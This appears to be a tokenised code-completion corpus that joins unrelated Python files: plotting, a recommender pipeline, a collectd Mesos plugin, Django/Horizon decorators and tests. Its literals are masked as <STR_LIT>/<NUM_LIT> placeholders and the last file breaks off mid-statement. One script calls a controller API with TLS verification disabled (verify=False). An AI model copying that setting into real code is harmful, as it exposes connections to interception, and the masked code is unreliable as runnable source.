kw ) <EOL> plt . axvline ( dx , ** kw ) <EOL> kw = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } <EOL> plt . annotate ( "<STR_LIT>" , xy = ( dx / <NUM_LIT:2> , <NUM_LIT:2> * dx - <NUM_LIT> ) , color = '<STR_LIT>' , ** kw ) <EOL> plt . annotate ( "<STR_LIT>" , xy = ( dx / <NUM_LIT:2> , dx - <NUM_LIT> ) , color = '<STR_LIT>' , ** kw ) <EOL> plt . annotate ( "<STR_LIT>" , xy = ( <NUM_LIT:3> * dx / <NUM_LIT:2> , <NUM_LIT:2> * dx - <NUM_LIT> ) , color = '<STR_LIT:k>' , ** kw ) <EOL> plt . annotate ( "<STR_LIT>" , xy = ( <NUM_LIT:3> * dx / <NUM_LIT:2> , dx - <NUM_LIT> ) , color = '<STR_LIT:k>' , ** kw ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> hide_axes ( ) <EOL> plt . savefig ( '<STR_LIT>' ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import random <EOL> import json <EOL> from bubbly . model import ModelGroup <EOL> from bubbly . dr1 import UnrestrictedLocationGenerator <EOL> def locations ( ) : <EOL> random . seed ( <NUM_LIT> ) <EOL> lg = UnrestrictedLocationGenerator ( ) <EOL> fields = lg . random_iterator ( ) <EOL> return sorted ( [ next ( fields ) for _ in range ( <NUM_LIT> ) ] ) <EOL> def main ( ) : <EOL> model = ModelGroup . load ( '<STR_LIT>' ) <EOL> loc = locations ( ) <EOL> result = { '<STR_LIT>' : loc } <EOL> result [ '<STR_LIT>' ] = model . decision_function ( loc ) . tolist ( ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as outfile : <EOL> json . dump ( result , outfile ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> TEST_IDS_PATH = '<STR_LIT>' <EOL> TEST_IDS_DUMMY_PATH = '<STR_LIT>' <EOL> PROCESSED_TRAIN_PATH = '<STR_LIT>' <EOL> ORIGINAL_DATA_PATH = '<STR_LIT>' <EOL> ORIGINAL_DATA_CLEAN_PATH = '<STR_LIT>' <EOL> MOVIE_TAG_PATH = '<STR_LIT>' <EOL> USER_SOCIAL_PATH = '<STR_LIT>' <EOL> USER_HISTORY_PATH = '<STR_LIT>' <EOL> PROCESSED_SOCIAL = '<STR_LIT>' <EOL> PROCESSED_HISTORY = '<STR_LIT>' <EOL> PROCESSED_MOVIE_TAGS = '<STR_LIT>' <EOL> PROCESSED_DATA_PATH = '<STR_LIT>' <EOL> PROCESSED_DATA_PATH_TEMP = '<STR_LIT>' <EOL> EFFECTS_USER_PATH = '<STR_LIT>' <EOL> EFFECTS_MOVIE_PATH = '<STR_LIT>' <EOL> EFFECTS_GLOBAL_PATH = '<STR_LIT>' <EOL> MODEL_BOOT_PATH = '<STR_LIT>' <EOL> MODEL_RUN_PATH = '<STR_LIT>' <EOL> MODEL_PREDICT_PATH = '<STR_LIT>' <EOL> MODEL_TMP_PATH = '<STR_LIT>' <EOL> MODEL_FEATURED_PATH = '<STR_LIT>' <EOL> MODEL_LOG_PATH = '<STR_LIT>' <EOL> MODEL_CONFIG_PATH = '<STR_LIT>' <EOL> HYBRID_ORIGINAL_PATH = '<STR_LIT>' <EOL> HYBRID_BOOT_PATH = '<STR_LIT>' <EOL> HYBRID_LOG_PATH = '<STR_LIT>' <EOL> HYBRID_PREDICT_PATH = '<STR_LIT>' <EOL> HYBRID_RMSE_PATH = '<STR_LIT>' <EOL> SYNTH_ORIGINAL_PATH = '<STR_LIT>' <EOL> SYNTH_BOOT_PATH = '<STR_LIT>' <EOL> SYNTH_PREDICT_PATH = '<STR_LIT>' <EOL> SYNTH_RMSE_PATH = '<STR_LIT>' <EOL> SYNTH_LOG_PATH = '<STR_LIT>' <EOL> TRIAL_OUTPUT_PATH = '<STR_LIT>' <EOL> OUTPUT_PATH = '<STR_LIT>' <EOL> FM_GLOBAL_BIAS = '<STR_LIT:1>' <EOL> FM_ONE_WAY_INTERACTION = '<STR_LIT:1>' <EOL> LIBFM_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_BUFFER_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_GROUP_BUFFER_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_LINE_REORDER = '<STR_LIT>' <EOL> SVDFEATURE_SVDPP_RANDORDER = '<STR_LIT>' <EOL> SVDFEATURE_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_INFER_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_MODEL_OUT_PATH = '<STR_LIT>' <EOL> def grabCSVColumn ( csv_path , columnNumber ) : <EOL> import csv <EOL> data = csv . 
reader ( open ( csv_path , '<STR_LIT>' ) , delimiter = "<STR_LIT:\t>" , quotechar = '<STR_LIT:|>' ) <EOL> ans = [ ] <EOL> for row in data : <EOL> ans . append ( row [ columnNumber ] ) <EOL> return ans <EOL> def prependTxtToFile ( inputPath , outputPath , txt ) : <EOL> with file ( inputPath , '<STR_LIT:r>' ) as original : <EOL> data = original . read ( ) <EOL> with file ( outputPath , '<STR_LIT:w>' ) as modified : <EOL> modified . write ( txt + '<STR_LIT:\n>' + data ) <EOL> def bootstrap ( inputPath , outputPath , nRows , random , replace ) : <EOL> fout = open ( outputPath , '<STR_LIT:w>' ) <EOL> rows = [ ] <EOL> fin = open ( inputPath , '<STR_LIT:r>' ) <EOL> if replace : <EOL> for line in fin : <EOL> rows . append ( line ) <EOL> for i in range ( nRows ) : <EOL> fout . write ( rows [ random . randint ( <NUM_LIT:0> , len ( rows ) - <NUM_LIT:1> ) ] ) <EOL> else : <EOL> finLines = fin . readlines ( ) <EOL> samples = random . sample ( range ( <NUM_LIT:0> , len ( finLines ) ) , nRows ) <EOL> for i in samples : <EOL> rows . append ( finLines [ i ] ) <EOL> for row in rows : <EOL> fout . write ( row ) <EOL> fout . close ( ) <EOL> def bootsplit ( inputPath , tempPath , outputPath1 , outputPath2 , split , random ) : <EOL> randomizeData ( random , inputPath , tempPath ) <EOL> splitData ( tempPath , outputPath1 , outputPath2 , split ) <EOL> def appendColumns ( infilePath1 , infilePath2 , outfilePath , outputSorted ) : <EOL> fin1 = open ( infilePath1 , '<STR_LIT:r>' ) <EOL> fin2 = open ( infilePath2 , '<STR_LIT:r>' ) <EOL> fout = open ( outfilePath , '<STR_LIT:w>' ) <EOL> userSet = set ( ) <EOL> userOrder = [ ] <EOL> linesByUser = { } <EOL> for line in fin1 : <EOL> if line != '<STR_LIT:\n>' : <EOL> columns = line . split ( '<STR_LIT:\t>' ) <EOL> user = int ( columns [ <NUM_LIT:0> ] ) <EOL> if user not in userSet : <EOL> userSet . add ( user ) <EOL> userOrder . append ( user ) <EOL> linesByUser [ user ] = [ ] <EOL> linesByUser [ user ] . 
append ( line ) <EOL> for line in fin2 : <EOL> if line != '<STR_LIT:\n>' : <EOL> columns = line . split ( '<STR_LIT:\t>' ) <EOL> user = int ( columns [ <NUM_LIT:0> ] ) <EOL> if user not in userSet : <EOL> userSet . add ( user ) <EOL> userOrder . append ( user ) <EOL> linesByUser [ user ] = [ ] <EOL> linesByUser [ user ] . append ( line ) <EOL> fin1 . close ( ) <EOL> fin2 . close ( ) <EOL> if outputSorted : <EOL> userOrder . sort ( ) <EOL> for user in userOrder : <EOL> for line in linesByUser . get ( user ) : <EOL> fout . write ( line ) <EOL> fout . close ( ) <EOL> def randomizeData ( random , inputPath , outputPath ) : <EOL> lines_seen = set ( ) <EOL> data = [ ] <EOL> newDataFile = open ( outputPath , '<STR_LIT:w>' ) <EOL> for line in open ( inputPath , '<STR_LIT:r>' ) : <EOL> if line != '<STR_LIT:\n>' : <EOL> if line not in lines_seen : <EOL> data . append ( ( random . random ( ) , line ) ) <EOL> lines_seen . add ( line ) <EOL> data . sort ( ) <EOL> newDataFile = open ( outputPath , '<STR_LIT:w>' ) <EOL> for _ , line in data : <EOL> newDataFile . write ( line ) <EOL> newDataFile . close ( ) <EOL> def aggregatePredictions ( masterPath , foutPath , actualPred , predictionPathList ) : <EOL> master = open ( masterPath , '<STR_LIT:r>' ) <EOL> fout = open ( foutPath , '<STR_LIT:w>' ) <EOL> userDict = { } <EOL> for path in predictionPathList : <EOL> fin = open ( path , '<STR_LIT:r>' ) <EOL> for line in fin : <EOL> if line != '<STR_LIT:\n>' : <EOL> line = line . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> columns = line . split ( '<STR_LIT:\t>' ) <EOL> user = columns [ <NUM_LIT:0> ] <EOL> movie = columns [ <NUM_LIT:1> ] <EOL> rating = columns [ <NUM_LIT:2> ] <EOL> if user not in userDict : <EOL> userDict [ user ] = { } <EOL> if movie not in userDict [ user ] : <EOL> userDict [ user ] [ movie ] = [ ] <EOL> userDict [ user ] [ movie ] . append ( rating ) <EOL> for line in master : <EOL> if line != '<STR_LIT:\n>' : <EOL> line = line . 
replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> columns = line . split ( '<STR_LIT:\t>' ) <EOL> user = columns [ <NUM_LIT:0> ] <EOL> movie = columns [ <NUM_LIT:1> ] <EOL> if actualPred : <EOL> rating = columns [ <NUM_LIT:2> ] <EOL> if user in userDict : <EOL> if movie in userDict [ user ] : <EOL> string = '<STR_LIT>' <EOL> for pred in userDict [ user ] [ movie ] : <EOL> string = string + pred + '<STR_LIT:\t>' <EOL> string = string [ : - <NUM_LIT:1> ] <EOL> fout . write ( line + '<STR_LIT:\t>' + string + '<STR_LIT:\n>' ) <EOL> else : <EOL> fout . write ( line + '<STR_LIT:\n>' ) <EOL> def splitData ( inputPath , outputPath1 , outputPath2 , split ) : <EOL> counter = <NUM_LIT:0> <EOL> data = open ( inputPath , '<STR_LIT:r>' ) <EOL> outfile1 = open ( outputPath1 , '<STR_LIT:w>' ) <EOL> outfile2 = open ( outputPath2 , '<STR_LIT:w>' ) <EOL> dataLines = data . readlines ( ) <EOL> lineCount = len ( dataLines ) <EOL> for line in dataLines : <EOL> if counter < int ( lineCount * split ) : <EOL> outfile1 . write ( line ) <EOL> counter += <NUM_LIT:1> <EOL> else : <EOL> outfile2 . write ( line ) <EOL> data . close ( ) <EOL> outfile1 . close ( ) <EOL> outfile2 . close ( ) </s>
<s> import unittest <EOL> import JustReleaseNotes . artifacters <EOL> from JustReleaseNotes . artifacters import factory <EOL> class factory_Test ( unittest . TestCase ) : <EOL> def test_factoryRetrievesArtifactory ( self ) : <EOL> self . assertIsNotNone ( JustReleaseNotes . artifacters . factory . create ( <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } <EOL> } } ) ) <EOL> def test_factoryRetrievesGitHubReleases ( self ) : <EOL> self . assertIsNotNone ( JustReleaseNotes . artifacters . factory . create ( <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } ) ) <EOL> def test_failsIfArtifacterUnknown ( self ) : <EOL> with self . assertRaises ( Exception ) : <EOL> JustReleaseNotes . artifacters . factory . create ( { "<STR_LIT>" : "<STR_LIT>" } ) </s>
<s> import collectd <EOL> import json <EOL> import urllib2 <EOL> import socket <EOL> import collections <EOL> PREFIX = "<STR_LIT>" <EOL> MESOS_INSTANCE = "<STR_LIT>" <EOL> MESOS_HOST = "<STR_LIT:localhost>" <EOL> MESOS_PORT = <NUM_LIT> <EOL> MESOS_VERSION = "<STR_LIT>" <EOL> MESOS_URL = "<STR_LIT>" <EOL> VERBOSE_LOGGING = False <EOL> CONFIGS = [ ] <EOL> Stat = collections . namedtuple ( '<STR_LIT>' , ( '<STR_LIT:type>' , '<STR_LIT:path>' ) ) <EOL> STATS_MESOS = { <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> } <EOL> STATS_MESOS_019 = { <EOL> } <EOL> STATS_MESOS_020 = { <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> } <EOL> STATS_MESOS_021 = { <EOL> 
'<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> } <EOL> STATS_MESOS_022 = STATS_MESOS_021 . copy ( ) <EOL> def get_stats_string ( version ) : <EOL> if version == "<STR_LIT>" or version == "<STR_LIT>" : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_019 . items ( ) ) <EOL> elif version == "<STR_LIT>" or version == "<STR_LIT>" : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_020 . items ( ) ) <EOL> elif version == "<STR_LIT>" or version == "<STR_LIT>" : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_021 . items ( ) ) <EOL> elif version == "<STR_LIT>" or version == "<STR_LIT>" : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_022 . items ( ) ) <EOL> else : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_022 . items ( ) ) <EOL> return stats_cur <EOL> def lookup_stat ( stat , json , conf ) : <EOL> val = dig_it_up ( json , get_stats_string ( conf [ '<STR_LIT:version>' ] ) [ stat ] . path ) <EOL> if not isinstance ( val , bool ) : <EOL> return val <EOL> else : <EOL> return None <EOL> def configure_callback ( conf ) : <EOL> """<STR_LIT>""" <EOL> host = MESOS_HOST <EOL> port = MESOS_PORT <EOL> verboseLogging = VERBOSE_LOGGING <EOL> version = MESOS_VERSION <EOL> instance = MESOS_INSTANCE <EOL> for node in conf . 
children : <EOL> if node . key == '<STR_LIT>' : <EOL> host = node . values [ <NUM_LIT:0> ] <EOL> elif node . key == '<STR_LIT>' : <EOL> port = int ( node . values [ <NUM_LIT:0> ] ) <EOL> elif node . key == '<STR_LIT>' : <EOL> verboseLogging = bool ( node . values [ <NUM_LIT:0> ] ) <EOL> elif node . key == '<STR_LIT>' : <EOL> version = node . values [ <NUM_LIT:0> ] <EOL> elif node . key == '<STR_LIT>' : <EOL> instance = node . values [ <NUM_LIT:0> ] <EOL> else : <EOL> collectd . warning ( '<STR_LIT>' % node . key ) <EOL> continue <EOL> log_verbose ( '<STR_LIT:true>' , '<STR_LIT>' % ( host , port , verboseLogging , version , instance ) ) <EOL> CONFIGS . append ( { <EOL> '<STR_LIT:host>' : host , <EOL> '<STR_LIT:port>' : port , <EOL> '<STR_LIT>' : "<STR_LIT>" + host + "<STR_LIT::>" + str ( port ) + "<STR_LIT>" , <EOL> '<STR_LIT>' : verboseLogging , <EOL> '<STR_LIT:version>' : version , <EOL> '<STR_LIT>' : instance , <EOL> } ) <EOL> def fetch_stats ( ) : <EOL> for conf in CONFIGS : <EOL> try : <EOL> result = json . load ( urllib2 . urlopen ( conf [ '<STR_LIT>' ] , timeout = <NUM_LIT:10> ) ) <EOL> except urllib2 . URLError , e : <EOL> collectd . error ( '<STR_LIT>' % ( conf [ '<STR_LIT>' ] , e ) ) <EOL> return None <EOL> parse_stats ( conf , result ) <EOL> def parse_stats ( conf , json ) : <EOL> """<STR_LIT>""" <EOL> for name , key in get_stats_string ( conf [ '<STR_LIT:version>' ] ) . iteritems ( ) : <EOL> result = lookup_stat ( name , json , conf ) <EOL> dispatch_stat ( result , name , key , conf ) <EOL> def dispatch_stat ( result , name , key , conf ) : <EOL> """<STR_LIT>""" <EOL> if result is None : <EOL> collectd . warning ( '<STR_LIT>' % name ) <EOL> return <EOL> estype = key . type <EOL> value = result <EOL> log_verbose ( conf [ '<STR_LIT>' ] , '<STR_LIT>' % ( estype , name , value , conf [ '<STR_LIT>' ] ) ) <EOL> val = collectd . Values ( plugin = '<STR_LIT>' ) <EOL> val . type = estype <EOL> val . type_instance = name <EOL> val . values = [ value ] <EOL> val . 
plugin_instance = conf [ '<STR_LIT>' ] <EOL> val . meta = { '<STR_LIT:0>' : True } <EOL> val . dispatch ( ) <EOL> def read_callback ( ) : <EOL> log_verbose ( '<STR_LIT:true>' , '<STR_LIT>' ) <EOL> stats = fetch_stats ( ) <EOL> def dig_it_up ( obj , path ) : <EOL> try : <EOL> if type ( path ) in ( str , unicode ) : <EOL> path = path . split ( '<STR_LIT:.>' ) <EOL> return reduce ( lambda x , y : x [ y ] , path , obj ) <EOL> except : <EOL> return False <EOL> def log_verbose ( enabled , msg ) : <EOL> if not enabled : <EOL> return <EOL> collectd . info ( '<STR_LIT>' % msg ) <EOL> collectd . register_config ( configure_callback ) <EOL> collectd . register_read ( read_callback ) </s>
<s> import requests <EOL> controller_url = "<STR_LIT>" <EOL> delete_policy_url = controller_url + '<STR_LIT>' <EOL> policy_delete_response = requests . delete ( delete_policy_url , verify = False ) <EOL> print ( "<STR_LIT>" + policy_delete_response . text ) <EOL> task_url = controller_url + policy_delete_response . json ( ) [ '<STR_LIT>' ] [ '<STR_LIT:url>' ] <EOL> task_response = requests . get ( task_url , verify = False ) <EOL> print ( "<STR_LIT>" + task_response . json ( ) [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) </s>
<s> import logging <EOL> logging . basicConfig ( filename = '<STR_LIT>' , level = logging . DEBUG ) <EOL> logging . debug ( '<STR_LIT>' ) <EOL> logging . info ( '<STR_LIT>' ) <EOL> logging . warning ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import lxml . etree as ET <EOL> from django . conf import settings <EOL> class Response ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _build ( _type , tag , msg , xml ) : <EOL> """<STR_LIT>""" <EOL> response = ET . Element ( '<STR_LIT>' ) <EOL> if _type : <EOL> response . set ( '<STR_LIT:type>' , _type ) <EOL> msgtag = ET . Element ( tag ) <EOL> if msg : <EOL> msgtag . text = msg <EOL> response . append ( msgtag ) <EOL> if xml is not None : <EOL> response . append ( xml ) <EOL> return ET . tostring ( response ) <EOL> @ staticmethod <EOL> def error ( _type , msg , xml = None ) : <EOL> """<STR_LIT>""" <EOL> return Response . _build ( _type , '<STR_LIT:error>' , msg , xml ) <EOL> @ staticmethod <EOL> def success ( _type , msg , xml = None ) : <EOL> """<STR_LIT>""" <EOL> return Response . _build ( _type , '<STR_LIT:success>' , msg , xml ) <EOL> class ServerSettings ( object ) : <EOL> @ staticmethod <EOL> def user_aware ( ) : <EOL> return True <EOL> @ staticmethod <EOL> def session_path ( session ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT:data>' , '<STR_LIT>' , session ) <EOL> @ staticmethod <EOL> def yang_path ( user ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT:data>' , '<STR_LIT>' , user , '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def cxml_path ( user ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT:data>' , '<STR_LIT>' , user , '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def schema_path ( session ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( settings . BASE_DIR , '<STR_LIT:data>' , '<STR_LIT>' , session ) </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> from django . utils . decorators import available_attrs <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> def _current_component ( view_func , dashboard = None , panel = None ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( view_func , assigned = available_attrs ( view_func ) ) <EOL> def dec ( request , * args , ** kwargs ) : <EOL> if dashboard : <EOL> request . horizon [ '<STR_LIT>' ] = dashboard <EOL> if panel : <EOL> request . horizon [ '<STR_LIT>' ] = panel <EOL> return view_func ( request , * args , ** kwargs ) <EOL> return dec <EOL> def require_auth ( view_func ) : <EOL> """<STR_LIT>""" <EOL> from horizon . exceptions import NotAuthenticated <EOL> @ functools . wraps ( view_func , assigned = available_attrs ( view_func ) ) <EOL> def dec ( request , * args , ** kwargs ) : <EOL> if request . user . is_authenticated ( ) : <EOL> return view_func ( request , * args , ** kwargs ) <EOL> raise NotAuthenticated ( _ ( "<STR_LIT>" ) ) <EOL> return dec <EOL> def require_perms ( view_func , required ) : <EOL> """<STR_LIT>""" <EOL> from horizon . exceptions import NotAuthorized <EOL> current_perms = getattr ( view_func , '<STR_LIT>' , set ( [ ] ) ) <EOL> view_func . _required_perms = current_perms | set ( required ) <EOL> @ functools . wraps ( view_func , assigned = available_attrs ( view_func ) ) <EOL> def dec ( request , * args , ** kwargs ) : <EOL> if request . user . is_authenticated ( ) : <EOL> if request . user . has_perms ( view_func . _required_perms ) : <EOL> return view_func ( request , * args , ** kwargs ) <EOL> raise NotAuthorized ( _ ( "<STR_LIT>" ) <EOL> % request . path ) <EOL> if required : <EOL> return dec <EOL> else : <EOL> return view_func </s>
<s> import horizon <EOL> from horizon import base <EOL> try : <EOL> cats = horizon . get_dashboard ( "<STR_LIT>" ) <EOL> cats . name = "<STR_LIT>" <EOL> except base . NotRegistered : <EOL> cats = None <EOL> if cats : <EOL> try : <EOL> tigers = cats . get_panel ( "<STR_LIT>" ) <EOL> cats . unregister ( tigers . __class__ ) <EOL> except base . NotRegistered : <EOL> pass <EOL> try : <EOL> dogs = horizon . get_dashboard ( "<STR_LIT>" ) <EOL> horizon . unregister ( dogs . __class__ ) <EOL> except base . NotRegistered : <EOL> pass </s>
<s> import copy <EOL> from django import http <EOL> from horizon import exceptions <EOL> from horizon import tabs as horizon_tabs <EOL> from horizon . test import helpers as test <EOL> from horizon . test . tests . tables import MyTable <EOL> from horizon . test . tests . tables import TEST_DATA <EOL> class BaseTestTab ( horizon_tabs . Tab ) : <EOL> def get_context_data ( self , request ) : <EOL> return { "<STR_LIT>" : self } <EOL> class TabOne ( BaseTestTab ) : <EOL> slug = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> class TabDelayed ( BaseTestTab ) : <EOL> slug = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> preload = False <EOL> class TabDisabled ( BaseTestTab ) : <EOL> slug = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def enabled ( self , request ) : <EOL> return False <EOL> class TabDisallowed ( BaseTestTab ) : <EOL> slug = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def allowed ( self , request ) : <EOL> return False <EOL> class Group ( horizon_tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( TabOne , TabDelayed , TabDisabled , TabDisallowed ) <EOL> sticky = True <EOL> def tabs_not_available ( self ) : <EOL> self . _assert_tabs_not_available = True <EOL> class TabWithTable ( horizon_tabs . TableTab ) : <EOL> table_classes = ( MyTable , ) <EOL> name = "<STR_LIT>" <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_my_table_data ( self ) : <EOL> return TEST_DATA <EOL> class RecoverableErrorTab ( horizon_tabs . Tab ) : <EOL> name = "<STR_LIT>" <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_context_data ( self , request ) : <EOL> exc = exceptions . AlreadyExists ( "<STR_LIT>" , horizon_tabs . Tab ) <EOL> exc . silence_logging = True <EOL> raise exc <EOL> class TableTabGroup ( horizon_tabs . 
TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = [ TabWithTable ] <EOL> class TabWithTableView ( horizon_tabs . TabbedTableView ) : <EOL> tab_group_class = TableTabGroup <EOL> template_name = "<STR_LIT>" <EOL> class TabTests ( test . TestCase ) : <EOL> def test_tab_group_basics ( self ) : <EOL> tg = Group ( self . request ) <EOL> tabs = tg . get_tabs ( ) <EOL> self . assertQuerysetEqual ( tabs , [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , tg . get_id ( ) ) <EOL> self . assertEqual ( horizon_tabs . base . CSS_TAB_GROUP_CLASSES , <EOL> tg . get_default_classes ( ) ) <EOL> self . assertEqual ( "<STR_LIT>" , tg . get_tab ( "<STR_LIT>" ) . slug ) <EOL> self . assertIsNone ( tg . selected ) <EOL> self . assertIsNone ( tg . get_selected_tab ( ) ) <EOL> def test_tab_group_active_tab ( self ) : <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tab ( '<STR_LIT>' ) , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> def test_tab_basics ( self ) : <EOL> tg = Group ( self . request ) <EOL> tab_one = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_delayed = tg . 
